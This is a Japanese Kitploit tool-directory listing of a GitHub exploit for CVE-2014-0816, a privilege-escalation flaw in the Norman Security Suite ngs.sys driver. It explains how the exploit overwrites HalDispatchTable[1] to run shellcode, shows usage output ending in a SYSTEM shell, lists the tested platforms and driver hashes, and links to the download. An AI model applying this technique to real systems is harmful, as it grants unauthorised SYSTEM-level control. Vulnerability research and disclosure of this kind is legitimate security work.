Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2014-0816 — CVE-2014-0816 | Kitploit
ツール/GitHubGitHub/tandasat/cve-2014-0816
特権昇格脆弱性分析エクスプロイトバイナリエクスプロイト
GitHubtandasat/cve-2014-0816

CVE-2014-0816

CVE-2014-0816

リポジトリを見る
25109年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2014-0816

これはCVE-2014-0816(JVNDB-2014-000026:Norman Security Suiteに存在する権限昇格の脆弱性)に対するエクスプロイトです。

このエクスプロイトは、ngs.sys / ngs64.sys のIOCTLハンドラの脆弱性を悪用して、非管理者権限からSYSTEM権限でCMD.exeを起動します。

使い方

root@kitploit:~
C:\Users\user\Desktop> exploit_ngs.exe
[*] Exploit Norman General Security Driver (ngs.sys / ngs64.sys)
[*] Target file version: ver 5.0.740.0.
[*] An address file was created at C:\Users\user\Desktop\address.bin.
[*] Shellcode is located at 000000013F9357D0.
[*] The device was opened as 0000000000000044.
[*] The address file was opened as FFFFFFFF80000558.
[+] HalDispatchTable[1] is located at FFFFF800033FDC68.
[+] HalDispatchTable[1] was altered.
[+] Shellcode was executed.
[+] The SYSTEM shell was launched.
[*] Press any key to finish this program.

その後、新しいコンソールが表示されます。

root@kitploit:~
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\user\Desktop>whoami
nt authority\system

この脆弱性により、攻撃者は任意のアドレスを任意の値で上書きできるため、本エクスプロイトは、現在のプロセスの権限をSYSTEM権限に昇格させるシェルコードのアドレスを用いてHalDispatchTable[1]の値を書き換えます。

demo_win7_x64

この脆弱性は、Windows XPからWindows 8までのx86/x64両方の全てのプラットフォームで悪用可能ですが、本エクスプロイトは特定のプラットフォーム向けに設計・テストされています(例えば、SMEPのためWindows 8では動作しません)。

テスト済みプラットフォーム

  • Norman Security Suite 10.1
  • 2ad60239e6637132fcaa816348c6ec3b358db49e (ngs.sys)
  • 21da5771db8308292c9d88a16b73260be40f0b09 (ngs.sys)
  • d2e34871d4d0fe04087e89f9c9f3599193b8258a (ngs64.sys)
  • fa1ed5997466263c8f91d8a4f3a80e3712cf777e (ngs64.sys)
  • Windows XP (x86) SP3(ゲスト権限)
  • Windows 7 (x86/x64) SP1(ゲスト権限)
  • Windows 10 (x64) Build 14393(ゲスト権限、SMEP無効)

ライセンス

このソフトウェアはMITライセンスの下で公開されています。詳細はLICENSEを参照してください。

ツールをダウンロード